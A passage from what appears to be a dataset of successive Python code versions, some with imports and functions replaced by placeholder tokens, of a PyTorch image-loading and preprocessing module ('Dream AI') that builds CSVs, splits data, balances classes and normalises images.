val_csv:\n target_ids = [unique_targets.index(x) for x in val_targets]\n val_df.iloc[:, 1] = target_ids\n if test_csv:\n target_ids = [unique_targets.index(x) for x in test_targets]\n test_df.iloc[:, 1] = target_ids\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n unique_targets), unique_targets\n if not val_csv:\n train_df, val_df = split_df(train_df, split_size)\n if not test_csv:\n val_df, test_df = split_df(val_df, split_size)\n tr_images = [str(x) for x in list(train_df.iloc[:, 0])]\n val_images = [str(x) for x in list(val_df.iloc[:, 0])]\n test_images = [str(x) for x in list(test_df.iloc[:, 0])]\n if self.extension:\n tr_images = add_extension(tr_images, self.extension)\n val_images = add_extension(val_images, self.extension)\n test_images = add_extension(test_images, self.extension)\n train_df.iloc[:, 0] = tr_images\n val_df.iloc[:, 0] = val_images\n test_df.iloc[:, 0] = test_images\n train_df.to_csv(os.path.join(data_path, 'train.csv'), index=False)\n val_df.to_csv(os.path.join(data_path, 'val.csv'), index=False)\n test_df.to_csv(os.path.join(data_path, 'test.csv'), index=False)\n self.minorities, self.class_diffs = None, None\n if not self.obj or not self.multi_label:\n self.minorities, self.class_diffs = get_minorities(train_df)\n self.data_dfs = {self.tr_name: train_df, self.val_name: val_df,\n self.test_name: test_df}\n data_dict = {'data_dfs': self.data_dfs, 'data_dir': self.data_dir,\n 'num_classes': self.num_classes, 'class_names': self.\n class_names, 'minorities': self.minorities, 'class_diffs': self\n .class_diffs, 'obj': self.obj, 'multi_label': self.multi_label}\n self.data_dict = data_dict\n return data_dict\n\n def data_from_paths_to_csv(self, data_path, tr_path, val_path=None,\n test_path=None):\n train_df = csv_from_path(tr_path, tr_path)\n train_df.to_csv(os.path.join(data_path, self.tr_name + '.csv'),\n index=False)\n ret = self.tr_name + '.csv', None\n if val_path is not None:\n val_exists = os.path.exists(val_path)\n if val_exists:\n val_df = csv_from_path(val_path, tr_path)\n val_df.to_csv(os.path.join(data_path, self.val_name +\n '.csv'), index=False)\n ret = self.tr_name + '.csv', self.val_name + '.csv'\n if test_path is not None:\n test_exists = os.path.exists(test_path)\n if test_exists:\n test_df = csv_from_path(test_path, tr_path)\n test_df.to_csv(os.path.join(data_path, self.test_name +\n '.csv'), index=False)\n ret = 
(self.tr_name + '.csv', self.val_name + '.csv', self.\n test_name + '.csv')\n return ret\n\n def get_data(self, data_dict=None, s=(224, 224), dataset=\n my_image_csv_dataset, bs=32, balance=False, tfms=None, bal_tfms=\n None, tta=False, num_workers=4, stats_percentage=0.6):\n self.image_size = s\n if not data_dict:\n data_dict = self.data_dict\n data_dfs, data_dir, minorities, class_diffs, obj, multi_label = (\n data_dict['data_dfs'], data_dict['data_dir'], data_dict[\n 'minorities'], data_dict['class_diffs'], data_dict['obj'],\n data_dict['multi_label'])\n if obj or multi_label:\n balance = False\n if tta:\n tta_tfms = {self.tr_name: transforms.Compose([transforms.\n FiveCrop(s[0]), transforms.Lambda(lambda crops: torch.stack\n ([transforms.ToTensor()(crop) for crop in crops])),\n transforms.Lambda(lambda crops: torch.stack([transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(\n crop) for crop in crops]))]), self.val_name: transforms.\n Compose([transforms.FiveCrop(s[0]), transforms.Lambda(lambda\n crops: torch.stack([transforms.ToTensor()(crop) for crop in\n crops])), transforms.Lambda(lambda crops: torch.stack([\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])(crop) for crop in crops]))]), self.test_name:\n transforms.Compose([transforms.FiveCrop(s[0]), transforms.\n Lambda(lambda crops: torch.stack([transforms.ToTensor()(\n crop) for crop in crops])), transforms.Lambda(lambda crops:\n torch.stack([transforms.Normalize([0.485, 0.456, 0.406], [\n 0.229, 0.224, 0.225])(crop) for crop in crops]))])}\n else:\n tta_tfms = None\n if not bal_tfms:\n bal_tfms = {self.tr_name: [transforms.RandomHorizontalFlip()],\n self.val_name: None, self.test_name: None}\n else:\n bal_tfms = {self.tr_name: bal_tfms, self.val_name: None, self.\n test_name: None}\n if obj:\n resize_transform = transforms.Resize(s)\n else:\n resize_transform = transforms.Resize(s)\n if not tfms:\n tfms = [resize_transform, transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]\n else:\n tfms_temp = [resize_transform, transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])]\n tfms_temp[1:1] = tfms\n tfms = tfms_temp\n print(tfms)\n data_transforms = {self.tr_name: tfms, self.val_name: [transforms.\n Resize(s), transforms.ToTensor(), transforms.Normalize([0.485, \n 0.456, 0.406], [0.229, 0.224, 0.225])], self.test_name: [\n transforms.Resize(s), transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]}\n temp_tfms = [resize_transform, transforms.ToTensor()]\n temp_dataset = dataset(os.path.join(data_dir, self.tr_name),\n data_dfs[self.tr_name], temp_tfms)\n self.img_mean, self.img_std = get_img_stats(temp_dataset,\n stats_percentage)\n data_transforms[self.tr_name][-1].mean, data_transforms[self.tr_name][\n -1].std = self.img_mean, self.img_std\n data_transforms[self.val_name][-1].mean, data_transforms[self.val_name\n ][-1].std = self.img_mean, self.img_std\n data_transforms[self.test_name][-1].mean, data_transforms[self.\n test_name][-1].std = self.img_mean, self.img_std\n if balance:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj, minorities,\n class_diffs, bal_tfms[x]) for x in [self.tr_name, self.\n val_name, self.test_name]}\n else:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj) for x in [\n self.tr_name, self.val_name, self.test_name]}\n dataloaders 
= {x: torch.utils.data.DataLoader(image_datasets[x],\n batch_size=bs, shuffle=True, num_workers=num_workers) for x in\n [self.tr_name, self.val_name, self.test_name]}\n dataset_sizes = {x: len(image_datasets[x]) for x in [self.tr_name,\n self.val_name, self.test_name]}\n self.image_datasets, self.dataloaders, self.dataset_sizes = (\n image_datasets, dataloaders, dataset_sizes)\n return image_datasets, dataloaders, dataset_sizes\n\n def imshow(self, inp, title=None):\n \"\"\"Imshow for Tensor.\"\"\"\n inp = self.denorm_img(inp)\n plt.imshow(inp)\n if title:\n plt.title(title)\n plt.pause(0.001)\n\n def denorm_img(self, inp, calculate=False):\n inp = inp.numpy().transpose((1, 2, 0))\n if calculate:\n mean = np.mean(inp)\n std = np.std(inp)\n else:\n mean = self.img_mean.numpy()\n std = self.img_std.numpy()\n inp = std * inp + mean\n inp = np.clip(inp, 0, 1)\n return inp\n\n def show_data(self, folder_name='train', size=(64, 64), bs=5):\n self.get_data(size, bs)\n batch = next(iter(self.dataloaders[folder_name]))\n inputs, classes = batch[0], batch[1]\n out = torchvision.utils.make_grid(inputs)\n if self.reg:\n print(classes)\n self.imshow(out, title=[x for x in classes])\n elif self.multi_label:\n self.imshow(out, title=[self.class_names[np.nonzero(x.type(\n torch.LongTensor))] for x in classes])\n else:\n self.imshow(out, title=[self.class_names[x] for x in classes])\n", "<import token>\n\n\nclass my_image_csv_dataset(Dataset):\n\n def __init__(self, data_dir, data, transforms_=None, obj=False,\n minorities=None, diffs=None, bal_tfms=None):\n self.data_dir = data_dir\n self.data = data\n self.transforms_ = transforms_\n self.tfms = None\n self.obj = obj\n self.minorities = minorities\n self.diffs = diffs\n self.bal_tfms = bal_tfms\n assert transforms_ is not None, print('Please pass some transforms.')\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, index):\n img_path = os.path.join(self.data_dir, self.data.iloc[index, 0])\n img = Image.open(img_path)\n img = img.convert('RGB')\n img = torchvision.transforms.functional.to_grayscale(img,\n num_output_channels=3)\n y = self.data.iloc[index, 1]\n if self.minorities and self.bal_tfms:\n if y in self.minorities:\n if hasattr(self.bal_tfms, 'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[y]\n l = [self.bal_tfms]\n l.extend(self.transforms_)\n self.tfms = transforms.Compose(l)\n else:\n for t in self.bal_tfms:\n t.p = self.diffs[y]\n self.transforms_[1:1] = self.bal_tfms\n self.tfms = transforms.Compose(self.transforms_)\n else:\n self.tfms = transforms.Compose(self.transforms_)\n else:\n self.tfms = transforms.Compose(self.transforms_)\n x = self.tfms(img)\n if self.obj:\n s = x.size()[1]\n if isinstance(s, tuple):\n s = s[0]\n row_scale = s / img.size[0]\n col_scale = s / img.size[1]\n y = rescale_bbox(y, row_scale, col_scale)\n y.squeeze_()\n y2 = self.data.iloc[index, 2]\n y = y, y2\n return x, y\n\n\nclass my_image_folder(DatasetFolder):\n\n def __init__(self, root, transform=None, target_transform=None, loader=\n default_loader, minorities=None, diffs=None, bal_tfms=None,\n tta_tfms=None):\n super(my_image_folder, self).__init__(root, loader, IMG_EXTENSIONS,\n transform=transform, target_transform=target_transform)\n self.imgs = self.samples\n self.minorities = minorities\n self.diffs = diffs\n self.bal_tfms = bal_tfms\n self.tta_tfms = tta_tfms\n self.tfms = None\n\n def __getitem__(self, index):\n path, target = self.samples[index]\n sample = self.loader(path)\n if self.transform:\n if 
self.minorities and self.bal_tfms:\n if target in self.minorities:\n if hasattr(self.bal_tfms, 'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[target]\n l = [self.bal_tfms]\n l.extend(self.transform)\n self.tfms = transforms.Compose(l)\n else:\n for t in self.bal_tfms:\n t.p = self.diffs[target]\n self.tfms = transforms.Compose(self.bal_tfms + self\n .transform)\n else:\n self.tfms = transforms.Compose(self.transform)\n elif self.tta_tfms:\n self.tfms = self.tta_tfms\n else:\n self.tfms = transforms.Compose(self.transform)\n sample = self.tfms(sample)\n if self.target_transform:\n target = self.target_transform(target)\n return sample, target\n\n\ndef extract_data(dt):\n x = []\n y = []\n for a, b in dt:\n x.append(a)\n y.append(b)\n return x, y\n\n\ndef listdir_fullpath(d):\n return [os.path.join(d, f) for f in os.listdir(d)]\n\n\ndef get_minorities(df, thresh=0.8):\n c = df.iloc[:, 1].value_counts()\n lc = list(c)\n max_count = lc[0]\n diffs = [(1 - x / max_count) for x in lc]\n diffs = dict((k, v) for k, v in zip(c.keys(), diffs))\n minorities = [c.keys()[x] for x, y in enumerate(lc) if y < thresh *\n max_count]\n return minorities, diffs\n\n\ndef csv_from_path(path, img_dest):\n path = Path(path)\n img_dest = Path(img_dest)\n labels_paths = list(path.iterdir())\n tr_images = []\n tr_labels = []\n for l in labels_paths:\n if l.is_dir():\n for i in list(l.iterdir()):\n if i.suffix in IMG_EXTENSIONS:\n name = i.name\n label = l.name\n new_name = '{}_{}'.format(path.name, name)\n new_path = img_dest / new_name\n os.rename(i, new_path)\n tr_images.append(new_name)\n tr_labels.append(label)\n tr_img_label = {'Img': tr_images, 'Label': tr_labels}\n csv = pd.DataFrame(tr_img_label, columns=['Img', 'Label'])\n csv = csv.sample(frac=1).reset_index(drop=True)\n return csv\n\n\n<function token>\n\n\ndef one_hot(targets, multi=False):\n if multi:\n binerizer = MultiLabelBinarizer()\n dai_1hot = binerizer.fit_transform(targets)\n else:\n binerizer = LabelBinarizer()\n dai_1hot = binerizer.fit_transform(targets)\n return dai_1hot, binerizer.classes_\n\n\ndef get_index(arr, a):\n for i in range(len(arr)):\n if sum(arr[i] == a) == len(a):\n return i\n return False\n\n\ndef rescale_bbox(bb, row_scale, col_scale):\n bb = bb.reshape((-1, 4))\n for b in bb:\n r1, c1, r2, c2 = b\n b[0] = int(np.round(r1 * col_scale))\n b[1] = int(np.round(c1 * row_scale))\n b[2] = int(np.round(r2 * col_scale))\n b[3] = int(np.round(c2 * row_scale))\n bb = bb.reshape((1, -1))\n return bb\n\n\ndef get_img_stats(dataset, sz):\n size = int(len(dataset) * sz)\n i = 0\n imgs = []\n for img, _ in dataset:\n if i > size:\n break\n imgs.append(img)\n i += 1\n imgs_ = torch.stack(imgs, dim=3)\n imgs_ = imgs_.view(3, -1)\n imgs_mean = imgs_.mean(dim=1)\n imgs_std = imgs_.std(dim=1)\n return imgs_mean, imgs_std\n\n\n<function token>\n\n\ndef save_obj(obj, path):\n with open(path, 'wb') as f:\n pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)\n\n\n<function token>\n\n\nclass DataProcessor:\n\n def __init__(self, data_path=None, train_csv=None, val_csv=None, reg=\n False, tr_name='train', val_name='val', test_name='test', extension\n =None, setup_data=True):\n print('+------------------------------------+')\n print('| Dream AI |')\n print('+------------------------------------+')\n print()\n self.device = torch.device('cuda:0' if torch.cuda.is_available() else\n 'cpu')\n (self.data_path, self.train_csv, self.val_csv, self.reg, self.\n tr_name, self.val_name, self.test_name, self.extension) = (\n data_path, train_csv, 
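# A sketch of the class-balancing idea in the __getitem__ methods above:
# get_minorities() scores each class as 1 - count/max_count, and that score
# is written into the .p attribute of stochastic balancing transforms, so
# rarer classes are augmented more aggressively. The diffs values here are
# hypothetical stand-ins.
from torchvision import transforms

diffs = {'rare': 0.9, 'common': 0.0}            # stand-in for get_minorities()
flip = transforms.RandomHorizontalFlip()

def tfms_for(label, base):
    if diffs.get(label, 0) > 0:
        flip.p = diffs[label]                   # scale augmentation probability
        return transforms.Compose([flip] + list(base))
    return transforms.Compose(list(base))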
val_csv, reg, tr_name, val_name,\n test_name, extension)\n self.obj = False\n self.multi_label = False\n if setup_data:\n self.set_up_data()\n\n def set_up_data(self, split_size=0.15):\n data_path, train_csv, val_csv, tr_name, val_name, test_name = (self\n .data_path, self.train_csv, self.val_csv, self.tr_name, self.\n val_name, self.test_name)\n if not data_path:\n data_path = os.getcwd() + '/'\n tr_path = os.path.join(data_path, tr_name)\n val_path = os.path.join(data_path, val_name)\n test_path = os.path.join(data_path, test_name)\n if os.path.exists(os.path.join(data_path, tr_name + '.csv')):\n train_csv = tr_name + '.csv'\n if not train_csv:\n print('no')\n train_csv, val_csv, test_csv = self.data_from_paths_to_csv(\n data_path, tr_path, val_path, test_path)\n train_csv_path = os.path.join(data_path, train_csv)\n train_df = pd.read_csv(train_csv_path)\n if 'Unnamed: 0' in train_df.columns:\n train_df = train_df.drop('Unnamed: 0', 1)\n if len(train_df.columns) > 2:\n self.obj = True\n img_names = [str(x) for x in list(train_df.iloc[:, 0])]\n if self.extension:\n img_names = add_extension(img_names, self.extension)\n if val_csv:\n val_csv_path = os.path.join(data_path, val_csv)\n val_df = pd.read_csv(val_csv_path)\n val_targets = list(map(str, list(val_df.iloc[:, 1])))\n if test_csv:\n test_csv_path = os.path.join(data_path, test_csv)\n test_df = pd.read_csv(test_csv_path)\n test_targets = list(map(str, list(test_df.iloc[:, 1])))\n targets = list(map(str, list(train_df.iloc[:, 1])))\n lengths = [len(t) for t in [s.split() for s in targets]]\n self.target_lengths = lengths\n split_targets = [t.split() for t in targets]\n if self.obj:\n print('\\nObject Detection\\n')\n int_targets = [list(map(float, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n obj_targets = list(map(str, list(train_df.iloc[:, 2])))\n obj_split_targets = [t.split() for t in obj_targets]\n try:\n obj_split_targets = [list(map(int, x)) for x in\n obj_split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(obj_split_targets, True)\n c_names = list(onehot_classes)\n class_idx = [[c_names.index(i) for i in c] for c in\n obj_split_targets]\n zero_idx = np.zeros((len(targets), max(lengths) // 4), dtype=int)\n for i, t in enumerate(zero_idx):\n t[len(t) - len(class_idx[i]):] = class_idx[i]\n zero_idx[i] = t\n train_df.iloc[:, 2] = [torch.from_numpy(z).type(torch.\n LongTensor) for z in zero_idx]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n elif self.reg:\n print('\\nRegression\\n')\n int_targets = [list(map(int, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n self.data_dir, self.num_classes, self.class_names = data_path, max(\n lengths), np.unique(zero_targets, axis=1)\n elif lengths[1:] != lengths[:-1]:\n self.multi_label = True\n print('\\nMulti-label Classification\\n')\n try:\n split_targets = [list(map(int, x)) for x in split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(split_targets, self.\n multi_label)\n train_df.iloc[:, 
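# The single-label branch above maps each string label to an id with
# unique_targets.index(x), an O(n_classes) lookup per sample. A dict built
# once gives identical ids in O(1) per lookup -- a drop-in alternative sketch:
import numpy as np

targets = ['dog', 'cat', 'dog', 'bird']
unique_targets = list(np.unique(targets))            # sorted class names
to_id = {name: i for i, name in enumerate(unique_targets)}
target_ids = [to_id[t] for t in targets]             # [2, 1, 2, 0]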
1] = [torch.from_numpy(x).type(torch.\n FloatTensor) for x in dai_onehot]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n else:\n print('\\nSingle-label Classification\\n')\n unique_targets = list(np.unique(targets))\n target_ids = [unique_targets.index(x) for x in targets]\n train_df.iloc[:, 1] = target_ids\n if val_csv:\n target_ids = [unique_targets.index(x) for x in val_targets]\n val_df.iloc[:, 1] = target_ids\n if test_csv:\n target_ids = [unique_targets.index(x) for x in test_targets]\n test_df.iloc[:, 1] = target_ids\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n unique_targets), unique_targets\n if not val_csv:\n train_df, val_df = split_df(train_df, split_size)\n if not test_csv:\n val_df, test_df = split_df(val_df, split_size)\n tr_images = [str(x) for x in list(train_df.iloc[:, 0])]\n val_images = [str(x) for x in list(val_df.iloc[:, 0])]\n test_images = [str(x) for x in list(test_df.iloc[:, 0])]\n if self.extension:\n tr_images = add_extension(tr_images, self.extension)\n val_images = add_extension(val_images, self.extension)\n test_images = add_extension(test_images, self.extension)\n train_df.iloc[:, 0] = tr_images\n val_df.iloc[:, 0] = val_images\n test_df.iloc[:, 0] = test_images\n train_df.to_csv(os.path.join(data_path, 'train.csv'), index=False)\n val_df.to_csv(os.path.join(data_path, 'val.csv'), index=False)\n test_df.to_csv(os.path.join(data_path, 'test.csv'), index=False)\n self.minorities, self.class_diffs = None, None\n if not self.obj or not self.multi_label:\n self.minorities, self.class_diffs = get_minorities(train_df)\n self.data_dfs = {self.tr_name: train_df, self.val_name: val_df,\n self.test_name: test_df}\n data_dict = {'data_dfs': self.data_dfs, 'data_dir': self.data_dir,\n 'num_classes': self.num_classes, 'class_names': self.\n class_names, 'minorities': self.minorities, 'class_diffs': self\n .class_diffs, 'obj': self.obj, 'multi_label': self.multi_label}\n self.data_dict = data_dict\n return data_dict\n\n def data_from_paths_to_csv(self, data_path, tr_path, val_path=None,\n test_path=None):\n train_df = csv_from_path(tr_path, tr_path)\n train_df.to_csv(os.path.join(data_path, self.tr_name + '.csv'),\n index=False)\n ret = self.tr_name + '.csv', None\n if val_path is not None:\n val_exists = os.path.exists(val_path)\n if val_exists:\n val_df = csv_from_path(val_path, tr_path)\n val_df.to_csv(os.path.join(data_path, self.val_name +\n '.csv'), index=False)\n ret = self.tr_name + '.csv', self.val_name + '.csv'\n if test_path is not None:\n test_exists = os.path.exists(test_path)\n if test_exists:\n test_df = csv_from_path(test_path, tr_path)\n test_df.to_csv(os.path.join(data_path, self.test_name +\n '.csv'), index=False)\n ret = (self.tr_name + '.csv', self.val_name + '.csv', self.\n test_name + '.csv')\n return ret\n\n def get_data(self, data_dict=None, s=(224, 224), dataset=\n my_image_csv_dataset, bs=32, balance=False, tfms=None, bal_tfms=\n None, tta=False, num_workers=4, stats_percentage=0.6):\n self.image_size = s\n if not data_dict:\n data_dict = self.data_dict\n data_dfs, data_dir, minorities, class_diffs, obj, multi_label = (\n data_dict['data_dfs'], data_dict['data_dir'], data_dict[\n 'minorities'], data_dict['class_diffs'], data_dict['obj'],\n data_dict['multi_label'])\n if obj or multi_label:\n balance = False\n if tta:\n tta_tfms = {self.tr_name: transforms.Compose([transforms.\n FiveCrop(s[0]), transforms.Lambda(lambda crops: torch.stack\n 
([transforms.ToTensor()(crop) for crop in crops])),\n transforms.Lambda(lambda crops: torch.stack([transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(\n crop) for crop in crops]))]), self.val_name: transforms.\n Compose([transforms.FiveCrop(s[0]), transforms.Lambda(lambda\n crops: torch.stack([transforms.ToTensor()(crop) for crop in\n crops])), transforms.Lambda(lambda crops: torch.stack([\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])(crop) for crop in crops]))]), self.test_name:\n transforms.Compose([transforms.FiveCrop(s[0]), transforms.\n Lambda(lambda crops: torch.stack([transforms.ToTensor()(\n crop) for crop in crops])), transforms.Lambda(lambda crops:\n torch.stack([transforms.Normalize([0.485, 0.456, 0.406], [\n 0.229, 0.224, 0.225])(crop) for crop in crops]))])}\n else:\n tta_tfms = None\n if not bal_tfms:\n bal_tfms = {self.tr_name: [transforms.RandomHorizontalFlip()],\n self.val_name: None, self.test_name: None}\n else:\n bal_tfms = {self.tr_name: bal_tfms, self.val_name: None, self.\n test_name: None}\n if obj:\n resize_transform = transforms.Resize(s)\n else:\n resize_transform = transforms.Resize(s)\n if not tfms:\n tfms = [resize_transform, transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]\n else:\n tfms_temp = [resize_transform, transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])]\n tfms_temp[1:1] = tfms\n tfms = tfms_temp\n print(tfms)\n data_transforms = {self.tr_name: tfms, self.val_name: [transforms.\n Resize(s), transforms.ToTensor(), transforms.Normalize([0.485, \n 0.456, 0.406], [0.229, 0.224, 0.225])], self.test_name: [\n transforms.Resize(s), transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]}\n temp_tfms = [resize_transform, transforms.ToTensor()]\n temp_dataset = dataset(os.path.join(data_dir, self.tr_name),\n data_dfs[self.tr_name], temp_tfms)\n self.img_mean, self.img_std = get_img_stats(temp_dataset,\n stats_percentage)\n data_transforms[self.tr_name][-1].mean, data_transforms[self.tr_name][\n -1].std = self.img_mean, self.img_std\n data_transforms[self.val_name][-1].mean, data_transforms[self.val_name\n ][-1].std = self.img_mean, self.img_std\n data_transforms[self.test_name][-1].mean, data_transforms[self.\n test_name][-1].std = self.img_mean, self.img_std\n if balance:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj, minorities,\n class_diffs, bal_tfms[x]) for x in [self.tr_name, self.\n val_name, self.test_name]}\n else:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj) for x in [\n self.tr_name, self.val_name, self.test_name]}\n dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x],\n batch_size=bs, shuffle=True, num_workers=num_workers) for x in\n [self.tr_name, self.val_name, self.test_name]}\n dataset_sizes = {x: len(image_datasets[x]) for x in [self.tr_name,\n self.val_name, self.test_name]}\n self.image_datasets, self.dataloaders, self.dataset_sizes = (\n image_datasets, dataloaders, dataset_sizes)\n return image_datasets, dataloaders, dataset_sizes\n\n def imshow(self, inp, title=None):\n \"\"\"Imshow for Tensor.\"\"\"\n inp = self.denorm_img(inp)\n plt.imshow(inp)\n if title:\n plt.title(title)\n plt.pause(0.001)\n\n def denorm_img(self, inp, calculate=False):\n inp = inp.numpy().transpose((1, 2, 0))\n if calculate:\n mean = np.mean(inp)\n std = 
np.std(inp)\n else:\n mean = self.img_mean.numpy()\n std = self.img_std.numpy()\n inp = std * inp + mean\n inp = np.clip(inp, 0, 1)\n return inp\n\n def show_data(self, folder_name='train', size=(64, 64), bs=5):\n self.get_data(size, bs)\n batch = next(iter(self.dataloaders[folder_name]))\n inputs, classes = batch[0], batch[1]\n out = torchvision.utils.make_grid(inputs)\n if self.reg:\n print(classes)\n self.imshow(out, title=[x for x in classes])\n elif self.multi_label:\n self.imshow(out, title=[self.class_names[np.nonzero(x.type(\n torch.LongTensor))] for x in classes])\n else:\n self.imshow(out, title=[self.class_names[x] for x in classes])\n", "<import token>\n\n\nclass my_image_csv_dataset(Dataset):\n\n def __init__(self, data_dir, data, transforms_=None, obj=False,\n minorities=None, diffs=None, bal_tfms=None):\n self.data_dir = data_dir\n self.data = data\n self.transforms_ = transforms_\n self.tfms = None\n self.obj = obj\n self.minorities = minorities\n self.diffs = diffs\n self.bal_tfms = bal_tfms\n assert transforms_ is not None, print('Please pass some transforms.')\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, index):\n img_path = os.path.join(self.data_dir, self.data.iloc[index, 0])\n img = Image.open(img_path)\n img = img.convert('RGB')\n img = torchvision.transforms.functional.to_grayscale(img,\n num_output_channels=3)\n y = self.data.iloc[index, 1]\n if self.minorities and self.bal_tfms:\n if y in self.minorities:\n if hasattr(self.bal_tfms, 'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[y]\n l = [self.bal_tfms]\n l.extend(self.transforms_)\n self.tfms = transforms.Compose(l)\n else:\n for t in self.bal_tfms:\n t.p = self.diffs[y]\n self.transforms_[1:1] = self.bal_tfms\n self.tfms = transforms.Compose(self.transforms_)\n else:\n self.tfms = transforms.Compose(self.transforms_)\n else:\n self.tfms = transforms.Compose(self.transforms_)\n x = self.tfms(img)\n if self.obj:\n s = x.size()[1]\n if isinstance(s, tuple):\n s = s[0]\n row_scale = s / img.size[0]\n col_scale = s / img.size[1]\n y = rescale_bbox(y, row_scale, col_scale)\n y.squeeze_()\n y2 = self.data.iloc[index, 2]\n y = y, y2\n return x, y\n\n\nclass my_image_folder(DatasetFolder):\n\n def __init__(self, root, transform=None, target_transform=None, loader=\n default_loader, minorities=None, diffs=None, bal_tfms=None,\n tta_tfms=None):\n super(my_image_folder, self).__init__(root, loader, IMG_EXTENSIONS,\n transform=transform, target_transform=target_transform)\n self.imgs = self.samples\n self.minorities = minorities\n self.diffs = diffs\n self.bal_tfms = bal_tfms\n self.tta_tfms = tta_tfms\n self.tfms = None\n\n def __getitem__(self, index):\n path, target = self.samples[index]\n sample = self.loader(path)\n if self.transform:\n if self.minorities and self.bal_tfms:\n if target in self.minorities:\n if hasattr(self.bal_tfms, 'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[target]\n l = [self.bal_tfms]\n l.extend(self.transform)\n self.tfms = transforms.Compose(l)\n else:\n for t in self.bal_tfms:\n t.p = self.diffs[target]\n self.tfms = transforms.Compose(self.bal_tfms + self\n .transform)\n else:\n self.tfms = transforms.Compose(self.transform)\n elif self.tta_tfms:\n self.tfms = self.tta_tfms\n else:\n self.tfms = transforms.Compose(self.transform)\n sample = self.tfms(sample)\n if self.target_transform:\n target = self.target_transform(target)\n return sample, target\n\n\ndef extract_data(dt):\n x = []\n y = []\n for a, b in dt:\n 
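# collect inputs and targets into two parallel lists\n 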
x.append(a)\n y.append(b)\n return x, y\n\n\ndef listdir_fullpath(d):\n return [os.path.join(d, f) for f in os.listdir(d)]\n\n\ndef get_minorities(df, thresh=0.8):\n c = df.iloc[:, 1].value_counts()\n lc = list(c)\n max_count = lc[0]\n diffs = [(1 - x / max_count) for x in lc]\n diffs = dict((k, v) for k, v in zip(c.keys(), diffs))\n minorities = [c.keys()[x] for x, y in enumerate(lc) if y < thresh *\n max_count]\n return minorities, diffs\n\n\ndef csv_from_path(path, img_dest):\n path = Path(path)\n img_dest = Path(img_dest)\n labels_paths = list(path.iterdir())\n tr_images = []\n tr_labels = []\n for l in labels_paths:\n if l.is_dir():\n for i in list(l.iterdir()):\n if i.suffix in IMG_EXTENSIONS:\n name = i.name\n label = l.name\n new_name = '{}_{}'.format(path.name, name)\n new_path = img_dest / new_name\n os.rename(i, new_path)\n tr_images.append(new_name)\n tr_labels.append(label)\n tr_img_label = {'Img': tr_images, 'Label': tr_labels}\n csv = pd.DataFrame(tr_img_label, columns=['Img', 'Label'])\n csv = csv.sample(frac=1).reset_index(drop=True)\n return csv\n\n\n<function token>\n\n\ndef one_hot(targets, multi=False):\n if multi:\n binerizer = MultiLabelBinarizer()\n dai_1hot = binerizer.fit_transform(targets)\n else:\n binerizer = LabelBinarizer()\n dai_1hot = binerizer.fit_transform(targets)\n return dai_1hot, binerizer.classes_\n\n\n<function token>\n\n\ndef rescale_bbox(bb, row_scale, col_scale):\n bb = bb.reshape((-1, 4))\n for b in bb:\n r1, c1, r2, c2 = b\n b[0] = int(np.round(r1 * col_scale))\n b[1] = int(np.round(c1 * row_scale))\n b[2] = int(np.round(r2 * col_scale))\n b[3] = int(np.round(c2 * row_scale))\n bb = bb.reshape((1, -1))\n return bb\n\n\ndef get_img_stats(dataset, sz):\n size = int(len(dataset) * sz)\n i = 0\n imgs = []\n for img, _ in dataset:\n if i > size:\n break\n imgs.append(img)\n i += 1\n imgs_ = torch.stack(imgs, dim=3)\n imgs_ = imgs_.view(3, -1)\n imgs_mean = imgs_.mean(dim=1)\n imgs_std = imgs_.std(dim=1)\n return imgs_mean, imgs_std\n\n\n<function token>\n\n\ndef save_obj(obj, path):\n with open(path, 'wb') as f:\n pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)\n\n\n<function token>\n\n\nclass DataProcessor:\n\n def __init__(self, data_path=None, train_csv=None, val_csv=None, reg=\n False, tr_name='train', val_name='val', test_name='test', extension\n =None, setup_data=True):\n print('+------------------------------------+')\n print('| Dream AI |')\n 